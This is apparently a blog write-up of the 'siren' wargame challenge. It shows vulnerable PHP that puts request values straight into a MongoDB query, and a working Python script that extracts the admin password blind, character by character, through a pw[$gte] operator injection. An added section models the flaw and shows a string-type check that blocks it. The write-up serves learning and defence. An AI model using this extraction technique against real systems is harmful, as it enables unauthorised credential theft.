웹찢남


siren-writeup

harry595 2020. 1. 31. 22:26


<?php
  include "./config.php";
  login_chk();
  $db = mongodb_connect();
  // id and pw go from the request straight into the MongoDB query
  $query = array(
    "id" => $_GET['id'],
    "pw" => $_GET['pw']
  );
  echo "<hr>query : <strong>".json_encode($query)."</strong><hr><br>";
  $result = mongodb_fetch_array($db->prob_siren->find($query));
  if($result['id']) echo "<h2>Hello User</h2>";

  // the challenge is solved only when pw equals admin's stored pw exactly
  $query = array("id" => "admin");
  $result = mongodb_fetch_array($db->prob_siren->find($query));
  if($result['pw'] === $_GET['pw']) solve("siren");
  highlight_file(__FILE__);
?>

 

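From the look of it, this is blind SQL injection (bsi)..

While wondering how to do this in MongoDB, I went back to the blog I had read for the previous challenge and saw several conditional operators!

Seeing that $gte means >=, I figured I could use it to solve this, and CLEAR!!!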

 

import requests

# Candidate characters in ascending ASCII order, so the $gte comparison is monotonic
test = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
url = "https://los.rubiya.kr/chall/siren_9e402fc1bc38574071d8369c2c3819ba.php"
flag = ''
session = dict(PHPSESSID="자신의 PHPSESSID")  # replace with your own PHPSESSID

for i in range(1, 20):
    found = ''
    for j in test:
        # pw >= flag+j stays true while j is at or below the real character
        r = requests.post(url + "?id=admin&pw[$gte]=" + flag + j, cookies=session)
        if 'Hello User' not in r.text:
            break
        found = j  # largest candidate that still compares true
    if not found:
        break  # even the smallest candidate fails: no characters left
    flag += found
    print("finding pw: " + flag)
print("pw " + flag)


            

While writing the script I forgot about the ord function and wasted a lot of time...
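Why the pw[$gte] parameter reaches MongoDB as an operator, and the type check that stops it, as an added example (not part of the original post or of the challenge's code). The sample collection, its password and the function names are constructed for illustration, and only one level of PHP bracket parsing and the $gte operator are modelled.

```python
from urllib.parse import parse_qsl

# Constructed stand-in for the prob_siren collection (values are made up).
USERS = [{"id": "admin", "pw": "s3cr3t"}, {"id": "guest", "pw": "guest"}]

def php_get(query_string):
    """Mimic PHP's $_GET parsing for one bracket level:
    pw[$gte]=a becomes {'pw': {'$gte': 'a'}}, an array instead of a string."""
    params = {}
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            name, sub = key[:-1].split("[", 1)
            if not isinstance(params.get(name), dict):
                params[name] = {}
            params[name][sub] = value
        else:
            params[key] = value
    return params

def matches(doc, query):
    """Small subset of MongoDB matching: equality and the $gte operator."""
    for field, cond in query.items():
        actual = doc.get(field)
        if isinstance(cond, dict):
            for op, operand in cond.items():
                if op != "$gte":
                    raise ValueError("operator not modelled: " + op)
                if not (isinstance(actual, str) and actual >= operand):
                    return False
        elif actual != cond:
            return False
    return True

def find_vulnerable(params):
    """Same shape as the challenge: request values go into the query as-is."""
    query = {"id": params.get("id"), "pw": params.get("pw")}
    return next((d for d in USERS if matches(d, query)), None)

def find_hardened(params):
    """Accept only scalar strings, so a value can never be an operator document."""
    if not all(isinstance(params.get(k), str) for k in ("id", "pw")):
        raise ValueError("id and pw must be plain strings")
    return find_vulnerable(params)

if __name__ == "__main__":
    probe = php_get("id=admin&pw[$gte]=a")
    print(probe, "->", find_vulnerable(probe))  # operator reaches the query
    try:
        find_hardened(probe)
    except ValueError as err:
        print("rejected:", err)
```

In the PHP source the equivalent check is an is_string() test on $_GET['id'] and $_GET['pw'] before the query array is built.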
